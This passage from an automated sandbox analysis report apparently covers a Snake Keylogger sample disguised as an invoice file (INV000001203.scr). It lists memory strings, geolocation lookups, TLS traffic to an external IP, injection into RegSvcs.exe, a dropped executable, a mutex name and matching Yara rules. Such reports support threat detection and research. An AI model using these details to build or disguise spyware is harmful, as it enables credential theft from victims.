0000000D.00000002.880171313.000000000292D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002912000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.881474042.0000000003728000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002925000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000291A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000292D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002912000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.881474042.0000000003728000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002925000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000291A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000292D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002704000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002747000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027B2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002746000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002703000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002796000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: INV000001203.scr, 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, INV000001203.scr, 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002704000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002703000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: RegSvcs.exe, 0000000D.00000002.880171313.0000000002805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027B2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002746000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002796000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.1894
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002912000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.881474042.0000000003728000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002925000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000291A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000292D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002912000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.881474042.0000000003728000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002925000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000291A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000292D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: INV000001203.scr, bZqCbFmlynN.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
          Source: RegSvcs.exe, 0000000D.00000002.881584025.00000000036DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
          Source: RegSvcs.exe, 0000000D.00000002.880171313.000000000292D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.0000000003727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
          Source: RegSvcs.exe, 00000007.00000002.881474042.000000000377E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf%2B5.1%26aqs%3Dchrome..69i57j0l7.3167j0j7%26
          Source: RegSvcs.exe, 0000000D.00000002.881584025.000000000377D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
          Source: RegSvcs.exe, 0000000D.00000002.881584025.000000000377D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
          Source: RegSvcs.exe, 0000000D.00000002.881584025.000000000381D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.000000000377D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
          Source: RegSvcs.exe, 0000000D.00000002.880171313.000000000292D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.000000000377D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
          Source: RegSvcs.exe, 0000000D.00000002.881584025.000000000381D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.000000000377D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
          Source: RegSvcs.exe, 0000000D.00000002.881584025.000000000381D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
          Source: RegSvcs.exe, 00000007.00000002.881474042.000000000378B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.881474042.0000000003769000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.000000000383F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.00000000037C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.0000000003876000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.000000000381D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
          Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
          Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
          Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
          Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49197 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49193 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49197
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49193
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
          Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49193 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49197 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: INV000001203.scr PID: 3236, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: RegSvcs.exe PID: 3836, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          .NET source code contains very large array initializations
          Source: INV000001203.scr, TypeEditor.csLarge array initialization: : array initializer size 648345
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\INV000001203.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and write
          Source: INV000001203.scrStatic PE information: invalid certificate
          Source: INV000001203.scr, 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs INV000001203.scr
          Source: INV000001203.scr, 00000000.00000002.378776328.000000000287B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs INV000001203.scr
          Source: INV000001203.scr, 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs INV000001203.scr
          Source: INV000001203.scr, 00000000.00000002.377840328.0000000000354000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INV000001203.scr
          Source: INV000001203.scr, 00000000.00000002.378698217.0000000000950000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs INV000001203.scr
          Source: INV000001203.scr, 00000000.00000002.383328962.00000000056A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs INV000001203.scr
          Source: INV000001203.scr, 00000000.00000002.378776328.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs INV000001203.scr
          Source: INV000001203.scr, 00000000.00000002.383089386.0000000005360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesSwr.exe4 vs INV000001203.scr
          Source: INV000001203.scr, 00000000.00000000.352914029.000000000140E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesSwr.exe4 vs INV000001203.scr
          Source: INV000001203.scrBinary or memory string: OriginalFilenamesSwr.exe4 vs INV000001203.scr
          Source: INV000001203.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: INV000001203.scr PID: 3236, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: RegSvcs.exe PID: 3836, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: INV000001203.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: bZqCbFmlynN.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winSCR@16/9@54/13
          Source: C:\Users\user\Desktop\INV000001203.scrFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMutant created: \Sessions\1\BaseNamedObjects\UGhaQfeBjObIEOkkVuzbXTW
          Source: C:\Users\user\Desktop\INV000001203.scrFile created: C:\Users\user\AppData\Local\Temp\tmp693F.tmpJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........ .........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........!.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........!.........................s............................X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8......."!.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......4!.........................s............................X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......@!.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............$.......8.......R!.........................s............................X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......^!.........................s............................X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8.......p!.........................s.................... .......X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......|!.........................s............................X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........!.........................s............................X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........!.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......!.........................s....................$.......X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........!.........................s............................X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........!.........................s............................X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........!.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........!.........................s............................X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........".........................s....................l.......X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........".........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......8.......$".........................s............................X...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......0".........................s............................X...............Jump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................H.......(.P.....,.......h...............O.......................................................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........2.........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........2.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........2.........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$.......+2.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$.......=2.........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$.......I2.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......P.......X.......$.......[2.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$.......g2.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.$.......y2.........................s............X....... .......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........2.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........2.........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........2.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......2.........................s............X.......$.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........2.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........2.........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........2.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............X.......2.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........2.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........3.........................s....................l.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$........3.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....P.......X.......$.......-3.........................s............X...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......X.......$.......93.........................s............X...............................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ...................h........3......................................(...............................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P.....................h........3..............................................j.......H...............
          Source: INV000001203.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: INV000001203.scrStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
          Source: C:\Users\user\Desktop\INV000001203.scrFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
